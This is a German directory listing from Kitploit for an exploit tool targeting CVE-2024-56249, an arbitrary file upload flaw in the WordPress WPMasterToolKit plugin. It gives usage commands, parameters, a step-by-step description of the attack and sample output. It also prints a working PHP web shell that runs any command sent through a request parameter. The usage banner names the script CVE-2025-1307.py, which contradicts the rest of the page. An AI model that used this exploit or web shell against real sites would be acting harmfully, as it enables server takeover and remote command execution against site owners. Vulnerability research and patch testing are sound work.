Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-56249 — WordPress WPMasterToolKit Plugin <= 1.13.1 - Sicherheitslücke für beliebigen Datei-Upload | Kitploit
Tools/GitHubGitHub/nxploited/cve-2024-56249
Payload-GenerierungSchwachstellenanalyseExploitationShellcodeWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubnxploited/cve-2024-56249

CVE-2024-56249

WordPress WPMasterToolKit Plugin <= 1.13.1 - Sicherheitslücke für beliebigen Datei-Upload

Repository anzeigen
111vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🛠️ WordPress Master Toolkit Exploit (CVE-2024-56249)

🌟 Übersicht

Dieses Skript nutzt eine Schwachstelle für beliebigen Dateiupload im WordPress WPMasterToolKit Plugin aus, die es einem Angreifer ermöglicht, eine Web-Shell auf den Server hochzuladen. Die Schwachstelle besteht in Versionen <= 1.13.1 des Plugins.

📝 CVE-Details

  • CVE-ID: CVE-2024-56249
  • Veröffentlicht: 2025-01-02
  • Aktualisiert: 2025-01-02
  • Beschreibung: Schwachstelle für uneingeschränkten Upload von Dateien mit gefährlichem Typ in Webdeclic WPMasterToolKit ermöglicht das Hochladen einer Web-Shell auf einen Webserver.
  • CWE: CWE-434: Uneingeschränkter Upload von Dateien mit gefährlichem Typ
  • CVSS-Score: 9.1 (Kritisch)
  • CVSS-Vektor: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

🚀 Verwendung

Um diese Schwachstelle auszunutzen, verwenden Sie den folgenden Befehl:

root@kitploit:~
python CVE-2024-56249.py -u <URL> -un <USERNAME> -p <PASSWORD> -fn <FILENAME>

📋 Parameter

  • -u / --url: Ziel-WordPress-URL (z.B. http://192.168.100.74:888/wordpress)
  • -un / --username: WordPress-Admin-Benutzername
  • -p / --password: WordPress-Admin-Passwort
  • -fp / --filepath: Datei-Upload-Pfad (Standard: wp-content/uploads/2025/03)
  • -fn / --filename: Name der hochzuladenden Datei (Standard: shell.php)

🧩 Skript-Erklärung

🔍 1. Schwachstelle testen

Das Skript beginnt damit, die Ziel-URL zu testen, um zu überprüfen, ob sie für CVE-2024-56249 anfällig ist, indem es die Version des WPMasterToolKit-Plugins prüft.

🔑 2. Bei WordPress authentifizieren

Anschließend versucht es, sich mit den angegebenen Anmeldedaten im WordPress-Admin-Panel anzumelden.

🛡️ 3. Sicherheitstoken extrahieren

Nach erfolgreichem Login extrahiert das Skript die erforderlichen Sicherheitstoken (Nonce und Token), die für den Datei-Upload benötigt werden.

📤 4. Payload bereitstellen

Es lädt die angegebene Datei (z.B. eine Web-Shell) mit den extrahierten Token auf den Zielserver hoch.

✅ 5. Upload überprüfen

Schließlich überprüft das Skript, ob die Datei erfolgreich hochgeladen wurde, indem es ihre Erreichbarkeit über die Ziel-URL prüft.

📂 Hinweis

Stellen Sie sicher, dass sich die Shell-Datei (z.B. shell.php) vor dem Ausführen im selben Verzeichnis wie das Skript befindet. Dies ist notwendig, damit das Skript die Datei erfolgreich finden und hochladen kann.

Beispiel-Shell-Datei (shell.php)

root@kitploit:~
<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
}
?>

💡 Beispiel

root@kitploit:~
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php

🖥️ Ausgabe

root@kitploit:~
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
[🔍] Detected plugin version: 1.13.1
[🔥] Target is VULNERABLE to CVE-2024-56249! Exploiting...
[🔑] Attempting to log in...
[✅] Authentication successful!
[📡] Extracting security tokens...
[✅] Extracted nonce: e4ae47c8d8
[✅] Extracted token: e4ae47c8d8
[📤] Attempting to upload shell.php to wp-content/uploads/2025/03...
[✅] Upload request sent successfully.
[🔥] Shell successfully uploaded! Access it here: http://target/wp-content/uploads/2025/03/shell.php

🛠️ Skriptverwendung

root@kitploit:~
usage: CVE-2025-1307.py [-h] -u URL -un USERNAME -p PASSWORD [-fp FILEPATH] [-fn FILENAME]

Master Toolkit Exploit CVE-2024-56249 #by Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://192.168.100.74:888/wordpress4/)
  -un, --username USERNAME
                        WordPress admin username
  -p, --password PASSWORD
                        WordPress admin password
  -fp, --filepath FILEPATH
                        File upload path (default: wp-content/uploads/2025/03)
  -fn, --filename FILENAME
                        File name to upload (default: shell.php)

⚠️ Haftungsausschluss

Dieses Tool ist nur für Bildungszwecke bestimmt. Die Nutzung erfolgt auf eigene Gefahr. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.


Exploit-Skript von Nxploit | Khaled Alenazi

Tool herunterladen